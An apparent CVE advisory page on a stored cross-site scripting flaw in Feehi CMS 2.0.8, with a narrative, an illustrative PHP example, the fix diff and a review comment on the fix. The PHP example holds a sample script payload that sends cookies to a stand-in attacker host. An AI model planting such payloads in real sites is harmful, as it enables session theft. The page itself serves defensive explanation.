VYPR
Moderate severity · NVD Advisory · Published Jan 21, 2021 · Updated Aug 4, 2024

CVE-2020-21146

Description

Feehi CMS 2.0.8 is affected by a cross-site scripting (XSS) vulnerability. When the user name is inserted as JavaScript code, browsing the post will trigger the XSS.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Feehi CMS 2.0.8 is vulnerable to stored XSS: an attacker can register a username containing JavaScript, and it executes in the browser of anyone who views a post by that user.

CVE-2020-21146 describes a stored cross-site scripting (XSS) vulnerability in Feehi CMS 2.0.8. The root cause is that the username field is rendered into post pages without HTML output encoding: a username supplied at registration or profile creation is stored verbatim and later written into the page as markup, so any script tags or event handlers it contains are interpreted by the browser [1][3].

An unauthenticated attacker can exploit this by registering a new account via the /index.php?r=site/signup endpoint and supplying a malicious payload as the username. After registration, any visitor who views a post authored by that user (or possibly other pages that display the username) will have the injected script executed in their browser. No special privileges are needed beyond the ability to create an account [3].

The impact is typical of stored XSS: the attacker can execute arbitrary JavaScript in the context of the victim's session, potentially stealing cookies, session tokens, or performing actions on behalf of the user. Since the payload persists in the database, any user browsing affected content is at risk [1][3].

The vulnerability has been patched in the project repository. The fix, commit e92f6877d96e53498101d0664174956e94223d6e, overrides afterFind() in frontend/models/User.php and passes the username through Yii2's Html::encode() (htmlspecialchars with ENT_QUOTES) each time a record is loaded, so the value that reaches the view is already encoded and embedded scripts render as inert text [4]. Note that this encodes at model-load time rather than at the output boundary: every consumer of the loaded attribute receives the encoded string, and a record that is loaded and saved again persists the encoded form. Users are advised to upgrade to feehi/cms 2.0.8.1 or later.
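The following is an added example, not code from Feehi CMS or from the fix commit. It contrasts three ways of handling the attacker-controlled username discussed above: raw interpolation into the page (the bug), encoding at the output boundary, and encode-on-load in afterFind() (the approach the patch takes), and it shows the two caveats of the last one: raw row reads bypass the hook, and a load-then-save cycle double-encodes. The function and class names (renderAuthorUnsafe, renderAuthorSafe, UserRecord) and the in-memory "table" are assumptions for illustration; the payload string is constructed sample input.

```php
<?php
// Added example, not Feehi CMS code. Names are hypothetical; the "database" is an
// in-memory array so the script runs stand-alone with `php example.php`.
declare(strict_types=1);

// Equivalent of Yii2's Html::encode() with its defaults
// (ENT_QUOTES | ENT_SUBSTITUTE, UTF-8, double_encode = true).
function encode(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', true);
}

// Vulnerable pattern: the username is written into the page unchanged.
function renderAuthorUnsafe(string $username): string
{
    return '<div class="author">Posted by ' . $username . '</div>';
}

// Hardened pattern: encode exactly where the value meets HTML.
function renderAuthorSafe(string $username): string
{
    return '<div class="author">Posted by ' . encode($username) . '</div>';
}

// Stand-in for an ActiveRecord whose afterFind() encodes the attribute on load,
// mirroring the fix commit's approach.
final class UserRecord
{
    /** @var array<int,string> constructed sample table: id => username */
    public static array $table = [];
    public string $username = '';

    public static function find(int $id): self
    {
        $rec = new self();
        $rec->username = self::$table[$id];
        $rec->afterFind();
        return $rec;
    }

    public function afterFind(): void
    {
        $this->username = encode($this->username); // same idea as the patch
    }

    public function save(int $id): void
    {
        self::$table[$id] = $this->username; // writes whatever is in memory
    }
}

// Constructed attacker-controlled username (sample input, not from the advisory).
$payload = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';
UserRecord::$table[1] = $payload;

echo renderAuthorUnsafe($payload), PHP_EOL; // <script> reaches the browser as markup
echo renderAuthorSafe($payload), PHP_EOL;   // &lt;script&gt;... is displayed as text

// Encode-on-load is fine for a single read through the record class...
$u = UserRecord::find(1);
echo $u->username, PHP_EOL;                 // &lt;script&gt;...

// ...but a raw row read (array results from a plain query, a JSON API) never
// runs afterFind(), so the unencoded payload comes straight out of storage:
echo json_encode(['username' => UserRecord::$table[1]]), PHP_EOL;

// ...and a load-then-save cycle (for example a profile edit) persists the encoded
// form, which the next load encodes again:
$u->save(1);
echo UserRecord::find(1)->username, PHP_EOL; // &amp;lt;script&amp;gt;...
```

The last two echoed lines are the practical argument for encoding in the view rather than in the model: output encoding is context-specific (HTML here, JSON elsewhere), so applying it at load time either leaks the raw value through paths that skip the hook or corrupts the stored data on the next write.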

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package: feehi/cms (Packagist)
Affected versions: < 2.0.8.1
Patched versions: 2.0.8.1

Affected products: 2

Patches: 1
e92f6877d96e

fix: username xss vulnerability

https://github.com/liufee/cms · liufee · Nov 3, 2019 · via ghsa
1 file changed · +6 −0
  • frontend/models/User.php · +6 −0 · modified
    @@ -11,6 +11,7 @@
     use Exception;
     use Yii;
     use common\helpers\Util;
    +use yii\helpers\Html;
     
     /**
      * User model
    @@ -103,4 +104,9 @@ public function beforeDelete()
             return true;
         }
     
    +    public function afterFind(){
    +        parent::afterFind();
    +        $this->username = Html::encode($this->username);
    +    }
    +
     }
    \ No newline at end of file
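Review bot: encoding inside afterFind() bakes HTML output encoding into the model, so every consumer of $this->username on a loaded record receives the encoded string, not only HTML views: JSON responses, mail templates, string comparisons, and a subsequent save() will persist the encoded value, which the next afterFind() encodes again (Html::encode double-encodes by default). Prefer leaving the attribute untouched and calling Html::encode($model->username) at the output boundary in the views that render it; if encode-on-load is kept, the record must never be written back unchanged. The hook is also only reached through this one ActiveRecord class, so query results returned as arrays or other record classes that expose username are not covered by this change. Style: Yii's conventions put a space before the opening brace and the brace on its own line (`public function afterFind()` / `{`), and the file still ends without a trailing newline.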
    

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 4
